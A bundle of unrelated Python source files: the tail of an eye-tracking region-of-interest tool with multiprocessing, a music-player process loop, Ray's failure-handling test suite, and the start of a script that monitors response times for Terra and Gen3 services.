#---check if selected max or value above possible cores
if (cls.cores == 'max') or (cls.cores >= _max):
cls.cores = _max
else:
cls.cores = cls.cores
#----double check multiproessing
# if requested cores is 0 or 1, run without multiprocessing
if ((cls.cores == 0) or (cls.cores == 1)):
cls.isMultiprocessing = False
cls.console('not multiprocessing', 'purple')
# split directory by number of cores
else:
cls.isMultiprocessing = True
l_directory = np.array_split(cls.directory, cls.cores)
cls.console('multiprocessing with %s cores'%(cls.cores), 'purple')
# not multiprocessing
else:
cls.isMultiprocessing = False
cls.console('not multiprocessing', 'purple')
#----prepare to run
# if not multiprocessing
if not cls.isMultiprocessing:
if cls.detection == "haarcascade":
l_coords_all, _ = cls.haarcascade(cls.directory)
# finish
df, error = cls.finished(df=l_coords_all)
else:
l_bounds_all, _, _, _ = cls.manual_detection(cls.directory)
# finish
df, error = cls.finished(df=l_bounds_all)
# else if multiprocessing
else:
# collect each pipe (this is used to build send and receive portions of output)
queue = multiprocessing.Queue()
# prepare threads
if cls.detection == "haarcascade":
process = [multiprocessing.Process(target=cls.haarcascade, args=(l_directory[core].tolist(), core, queue,)) for core in range(cls.cores)]
else:
process = [multiprocessing.Process(target=cls.manual_detection, args=(l_directory[core].tolist(), core, queue,)) for core in range(cls.cores)]
# start each thread
for p in process:
p.daemon = True
p.start()
# return pipes
# note: see https://stackoverflow.com/a/45829852
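# note: results are drained from the queue *before* join() below; joining first can deadlock,
# because a child process will not exit while its queued data is still waiting to be consumed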
returns = []
for p in process:
returns.append(queue.get())
# wait for each process to finish
for p in process:
p.join()
#----after running
if cls.isDebug: cls.console('process() finished (multiprocessing)','purple')
df, error = cls.finished(returns)
return df, error
@classmethod
def finished(cls, df, errors=None):
"""
Process bounds for all images.
Parameters
----------
df : [type]
[description]
errors : [type], optional
[description], by default None
"""
# if multiprocessing, combine df from each thread
if cls.isMultiprocessing:
#concatenate data
df = [i[0] for i in df if len(i) != 0] #check if lists are empty (i.e. if there are more threads than directories)
df = pd.concat(df)
# else combine lists of df to df
else:
df = pd.concat(df)
#!!!----combine all rois across images
if cls.detection=='manual':
# export to xlsx or ias
_folder = '%s/data/'%(cls.output_path)
_filename = "bounds"
df = cls.export_data(df=df, path=_folder, filename=_filename, uuid=cls.uuid, level='all')
elif cls.detection=='haarcascade':
# export to xlsx
_folder = '%s/data/'%(cls.output_path)
_filepath = "%s/cascades.xlsx"%(_folder)
df.to_excel(_filepath, index=False)
#!!!----error log
if bool(errors):
_filename = Path('%s/error.csv'%(cls.output_path))
cls.console("Errors found. See log %s"%(_filename), 'red')
error = pd.DataFrame(errors, columns=['image','roi','message'])
error.to_csv(_filename, index=False)
else:
error = None
# finished
cls.console('finished()','purple')
return df, error
# if calling from cmd/terminal
if __name__ == '__main__':
import sys, argparse, re
# https://docs.python.org/3.7/library/argparse.html
# args
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
parser = argparse.ArgumentParser(
prog = sys.argv[0],
usage = "Create regions of interest to export into Eyelink DataViewer or statistical resources such as R and python."
)
# main arguments
parser.add_argument("--image_path", help="image_path.", default=None)
parser.add_argument("--output_path", help="output_path.", default=None)
parser.add_argument("--metadata_source", help="metadata_source.", default=None)
# start
args_ = parser.parse_args()
sys.exit(ROI(args_))
|
BROKEN with Music.py
|
''' Doc_String '''
# NOTE: Process and Queue are used below; poll_queue, run, and App are expected to be
# provided by MAIN (star-imported in the __main__ block at the bottom of this file).
from multiprocessing import Process, Queue
####################################################################
####################################################################
def main_loop( App ):
"Create QUEUE and start progress_bar process"
queue = Queue()
"Start a process that listens for the next Audio track"
music_player = Process(target=poll_queue, args=( queue, ))
music_player.start()
"Start the main App"
run(App, queue)
## Close Processes ##
"Check if music player is still running"
if music_player.is_alive():
queue.put('break')
music_player.join(timeout=0.1)
"Check if JOIN failed"
if music_player.is_alive():
print('music_player still alive...')
print('Killing music_player','\n')
music_player.terminate()
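# A minimal sketch of what the poll_queue worker imported from MAIN might look like
# (hypothetical -- the real implementation is not shown here): it blocks on the queue
# for track names and exits when it receives the 'break' sentinel used by main_loop above.
def _example_poll_queue(queue):
    while True:
        message = queue.get()             # blocks until the App sends something
        if message == 'break':            # sentinel sent by main_loop() on shutdown
            break
        print('Next audio track:', message)  # placeholder for actual playback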
####################################################################
####################################################################
if __name__ == '__main__':
from MAIN import *
main_loop( App )
####################################################################
####################################################################
|
test_failure.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import pyarrow.plasma as plasma
import pytest
import sys
import tempfile
import threading
import time
import numpy as np
import redis
import ray
import ray.ray_constants as ray_constants
from ray.tests.cluster_utils import Cluster
from ray.tests.utils import (
relevant_errors,
wait_for_errors,
)
def test_failed_task(ray_start_regular):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_return_vals=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
throw_exception_fct1.remote()
throw_exception_fct1.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
assert len(relevant_errors(ray_constants.TASK_PUSH_ERROR)) == 2
for task in relevant_errors(ray_constants.TASK_PUSH_ERROR):
msg = task.get("message")
assert "Test function 1 intentionally failed." in msg
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
@ray.remote
def f():
raise Exception("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
else:
# ray.get should throw an exception.
assert False
def test_fail_importing_remote_function(ray_start_2_cpus):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g():
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote()
wait_for_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert len(errors) == 2
assert "No module named" in errors[0]["message"]
assert "No module named" in errors[1]["message"]
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(Exception):
ray.get(g.remote())
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus):
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
wait_for_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR, 2)
# Check that the error message is in the task info.
errors = relevant_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert "Function to run failed." in errors[0]["message"]
assert "Function to run failed." in errors[1]["message"]
def test_fail_importing_actor(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo(object):
def __init__(self):
self.x = module.temporary_python_file()
def get_val(self):
return 1
# There should be no errors yet.
assert len(ray.errors()) == 0
# Create an actor.
foo = Foo.remote()
# Wait for the error to arrive.
wait_for_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR)
assert "No module named" in errors[0]["message"]
# Wait for the error from when the __init__ tries to run.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[0]["message"])
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception):
ray.get(foo.get_val.remote())
# Wait for the error from when the call to get_val.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[1]["message"])
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular):
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message1 in errors[0]["message"]
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 2
assert error_message1 in errors[1]["message"]
def test_failed_actor_method(ray_start_regular):
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message2 in errors[0]["message"]
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor(object):
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular):
@ray.remote
def f():
ray.worker.global_worker._get_next_task_from_raylet = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
wait_for_errors(ray_constants.WORKER_CRASH_PUSH_ERROR, 1)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_worker_dying(ray_start_regular):
# Define a remote function that will kill the worker that runs it.
@ray.remote
def f():
eval("exit()")
with pytest.raises(ray.exceptions.RayWorkerError):
ray.get(f.remote())
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert "died or was killed while executing" in errors[0]["message"]
def test_actor_worker_dying(ray_start_regular):
@ray.remote
class Actor(object):
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5.0)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_future_tasks(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular):
@ray.remote
class Actor(object):
pass
a = Actor.remote()
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
assert len(
ray.errors()) == 0, ("Should not have propagated an error - {}".format(
ray.errors()))
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory):
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
        # are still running, this call should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
def test_version_mismatch(shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
wait_for_errors(ray_constants.VERSION_MISMATCH_PUSH_ERROR, 1)
# Reset the version.
ray.__version__ = ray_version
def test_warning_monitor_died(shutdown_only):
ray.init(num_cpus=0)
time.sleep(1) # Make sure the monitor has started.
# Cause the monitor to raise an exception by pushing a malformed message to
# Redis. This will probably kill the raylets and the raylet_monitor in
# addition to the monitor.
fake_id = 20 * b"\x00"
malformed_message = "asdf"
redis_client = ray.worker.global_worker.redis_client
redis_client.execute_command(
"RAY.TABLE_ADD", ray.gcs_utils.TablePrefix.Value("HEARTBEAT_BATCH"),
ray.gcs_utils.TablePubsub.Value("HEARTBEAT_BATCH_PUBSUB"), fake_id,
malformed_message)
wait_for_errors(ray_constants.MONITOR_DIED_ERROR, 1)
def test_export_large_objects(ray_start_regular):
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 1)
@ray.remote
class Foo(object):
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 2)
def test_warning_for_infeasible_tasks(ray_start_regular):
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo(object):
pass
# This task is infeasible.
f.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
# This actor placement task is infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 2)
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
@ray.remote
class Foo(object):
pass
# The actor creation should be infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
def test_warning_for_too_many_actors(shutdown_only):
    # Check that we receive a warning if we run a workload that requires too
    # many workers to be started.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
class Foo(object):
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
[Foo.remote() for _ in range(num_cpus)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 2)
def test_warning_for_too_many_nested_tasks(shutdown_only):
    # Check that we receive a warning if we run a workload that requires too
    # many workers to be started.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def g():
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
time.sleep(1)
ray.get(f.remote())
[g.remote() for _ in range(num_cpus * 4)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
redis_address = address_info["redis_address"]
redis_address = redis_address.split(":")
assert len(redis_address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=redis_address[0], port=int(redis_address[1]))
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=redis_address[0], port=int(redis_address[1]))
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    # It's okay to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
    # It's okay to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
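    # As a hedged orientation only (the exact Ray wording is not reproduced
    # here): for a message of the rough shape
    # "The node with node id <id> has been marked dead ...",
    # split(" ")[5] would pick out <id>.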
warning_node_ids = {
item["message"].split(" ")[5]
for item in relevant_errors(ray_constants.REMOVED_NODE_ERROR)
}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
nonexistent_id = ray.ObjectID.from_random()
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(nonexistent_id)
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = json.dumps({
"num_heartbeats_timeout": 50,
"heartbeat_timeout_milliseconds": 10,
})
cluster = Cluster()
cluster.add_node(num_cpus=0, _internal_config=config)
ray.init(redis_address=cluster.redis_address)
info = relevant_errors(ray_constants.REMOVED_NODE_ERROR)
assert len(info) == 0
    # This node is killed by SIGKILL; ray_monitor will mark it as dead.
dead_node = cluster.add_node(num_cpus=0, _internal_config=config)
cluster.remove_node(dead_node, allow_graceful=False)
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 1, timeout=2)
    # This node is killed by SIGKILL; ray_monitor will mark it as dead.
dead_node = cluster.add_node(num_cpus=0, _internal_config=config)
cluster.remove_node(dead_node, allow_graceful=False)
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=2)
    # This node is killed by SIGTERM; ray_monitor will not mark it as dead again.
removing_node = cluster.add_node(num_cpus=0, _internal_config=config)
cluster.remove_node(removing_node, allow_graceful=True)
with pytest.raises(Exception, match=("Timing out of wait.")):
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 3, timeout=2)
# There is no connection error to a dead node.
info = relevant_errors(ray_constants.RAYLET_CONNECTION_ERROR)
assert len(info) == 0
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**7
}],
indirect=True)
@pytest.mark.parametrize("num_actors", [1, 2, 5])
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head, num_actors):
@ray.remote
class LargeMemoryActor(object):
def some_expensive_task(self):
return np.zeros(10**7 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(num_actors)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 2,
"object_store_memory": 10**7
}],
indirect=True)
def test_fill_plasma_exception(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor(object):
def some_expensive_task(self):
return np.zeros(10**7 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(plasma.PlasmaStoreFull):
ray.put(np.zeros(10**7 + 2, dtype=np.uint8))
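# Note: the helpers relevant_errors() and wait_for_errors() used throughout the
# tests above are not shown here (presumably defined or imported earlier in the
# module). A minimal sketch of what they might look like, inferred from their
# call sites (an assumption, not the actual implementations):
#
#   def relevant_errors(error_type):
#       return [e for e in ray.errors() if e["type"] == error_type]
#
#   def wait_for_errors(error_type, num_errors, timeout=10):
#       start = time.time()
#       while time.time() - start < timeout:
#           if len(relevant_errors(error_type)) >= num_errors:
#               return
#           time.sleep(0.1)
#       raise Exception("Timing out of wait.")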
|
monitor_response_times.py
|
import argparse
import csv
import functools
import json
import logging
import os
import psutil
import threading
import time
from abc import ABC, abstractmethod
from dataclasses import dataclass
from datetime import datetime, timezone
from enum import Enum
from pathlib import Path
from threading import Thread
from typing import Tuple, Optional, Any
import requests
import schedule
class DeploymentInfo:
_project = None
_terra_deployment_tier = None
_terra_deployment_info = None
_gen3_deployment_info = None
class Project(Enum):
ANVIL = 1
BDC = 2
CRDC = 3
KF = 4
@classmethod
def set_project(cls, project_name: str) -> None:
project = project_name.strip().upper()
try:
project_value = cls.Project[project]
except KeyError as ex:
raise Exception(f"Unsupported project name: '{project_name}'", ex)
cls._project = project_value
class TerraDeploymentTier(Enum):
DEV = 1
ALPHA = 2
PERF = 3
STAGING = 4
PROD = 5
@classmethod
def set_terra_deployment_tier(cls, tier_name: str) -> None:
tier = tier_name.strip().upper()
try:
tier_value = cls.TerraDeploymentTier[tier]
except KeyError as ex:
raise Exception(f"Invalid Terra deployment tier name: '{tier_name}'", ex)
cls._terra_deployment_tier = tier_value
@dataclass
class TerraDeploymentInfo:
bond_host: str
bond_provider: str
martha_host: str
__terra_bdc_dev = TerraDeploymentInfo("broad-bond-dev.appspot.com",
"fence",
"us-central1-broad-dsde-dev.cloudfunctions.net")
__terra_bdc_alpha = TerraDeploymentInfo("broad-bond-alpha.appspot.com",
"fence",
"us-central1-broad-dsde-alpha.cloudfunctions.net")
__terra_bdc_prod = TerraDeploymentInfo("broad-bond-prod.appspot.com",
"fence",
"us-central1-broad-dsde-prod.cloudfunctions.net")
__terra_crdc_dev = TerraDeploymentInfo("broad-bond-dev.appspot.com",
"dcf-fence",
"us-central1-broad-dsde-dev.cloudfunctions.net")
__terra_crdc_alpha = TerraDeploymentInfo("broad-bond-alpha.appspot.com",
"dcf-fence",
"us-central1-broad-dsde-alpha.cloudfunctions.net")
__terra_crdc_prod = TerraDeploymentInfo("broad-bond-prod.appspot.com",
"dcf-fence",
"us-central1-broad-dsde-prod.cloudfunctions.net")
@dataclass
class Gen3DeploymentInfo:
gen3_host: str
public_drs_uri: str
cloud_uri_scheme: str = "gs"
__gen3_bdc_staging = Gen3DeploymentInfo("staging.gen3.biodatacatalyst.nhlbi.nih.gov",
"drs://dg.712C:dg.712C/fa640b0e-9779-452f-99a6-16d833d15bd0")
__gen3_bdc_prod = Gen3DeploymentInfo("gen3.biodatacatalyst.nhlbi.nih.gov",
"drs://dg.4503:dg.4503/15fdd543-9875-4edf-8bc2-22985473dab6")
__gen3_crdc_staging = Gen3DeploymentInfo("nci-crdc-staging.datacommons.io",
"drs://dg.4DFC:ddacaa74-97a9-4a0e-aa36-3e65fc8382d5")
__gen3_crdc_prod = Gen3DeploymentInfo("nci-crdc.datacommons.io",
"drs://dg.4DFC:011a6a54-1bfe-4df9-ae24-990b12a812d3")
class UnsupportedConfigurationException(Exception):
pass
@classmethod
def terra_factory(cls) -> TerraDeploymentInfo:
if cls._terra_deployment_info is None:
if cls._project == cls.Project.BDC:
if cls._terra_deployment_tier == cls.TerraDeploymentTier.DEV:
cls._terra_deployment_info = cls.__terra_bdc_dev
elif cls._terra_deployment_tier == cls.TerraDeploymentTier.ALPHA:
cls._terra_deployment_info = cls.__terra_bdc_alpha
elif cls._terra_deployment_tier == cls.TerraDeploymentTier.PROD:
cls._terra_deployment_info = cls.__terra_bdc_prod
elif cls._project == cls.Project.CRDC:
if cls._terra_deployment_tier == cls.TerraDeploymentTier.DEV:
cls._terra_deployment_info = cls.__terra_crdc_dev
elif cls._terra_deployment_tier == cls.TerraDeploymentTier.ALPHA:
cls._terra_deployment_info = cls.__terra_crdc_alpha
elif cls._terra_deployment_tier == cls.TerraDeploymentTier.PROD:
cls._terra_deployment_info = cls.__terra_crdc_prod
if cls._terra_deployment_info is None:
raise cls.UnsupportedConfigurationException(
f"Response time monitoring for the combination of project \'{cls._project.name}\' and Terra deployment tier \'{cls._terra_deployment_tier.name}\' is currently unsupported.")
return cls._terra_deployment_info
@classmethod
def gen3_factory(cls) -> Gen3DeploymentInfo:
if cls._gen3_deployment_info is None:
if cls._project == cls.Project.BDC:
if cls._terra_deployment_tier == cls.TerraDeploymentTier.PROD:
cls._gen3_deployment_info = cls.__gen3_bdc_prod
else:
cls._gen3_deployment_info = cls.__gen3_bdc_staging
elif cls._project == cls.Project.CRDC:
if cls._terra_deployment_tier == cls.TerraDeploymentTier.PROD:
cls._gen3_deployment_info = cls.__gen3_crdc_prod
else:
cls._gen3_deployment_info = cls.__gen3_crdc_staging
if cls._gen3_deployment_info is None:
raise cls.UnsupportedConfigurationException(
f"Response time monitoring for the combination of project '{cls._project.name}' and Terra deployment tier '{cls._terra_deployment_tier.name}' is currently unsupported.")
return cls._gen3_deployment_info
class MonitoringUtilityMethods:
def __init__(self):
super().__init__()
@staticmethod
def format_timestamp_as_utc(seconds_since_epoch: float):
return datetime.fromtimestamp(seconds_since_epoch, timezone.utc).strftime("%Y/%m/%d %H:%M:%S")
@staticmethod
def monitoring_info(start_time: float, response: requests.Response):
response_duration = round(time.time() - start_time, 3)
response_code = response.status_code
response_reason = response.reason
return dict(start_time=start_time, response_duration=response_duration,
response_code=response_code, response_reason=response_reason)
def flatten_monitoring_info_dict(self, monitoring_info_dict: dict) -> dict:
flattened = dict()
for operation_name, mon_info in monitoring_info_dict.items():
for metric, value in mon_info.items():
if metric in ['start_time', 'response_duration', 'response_code', 'response_reason']:
if metric == 'start_time' and type(value) == float:
value = self.format_timestamp_as_utc(value)
flattened[f"{operation_name}.{metric}"] = value
return flattened
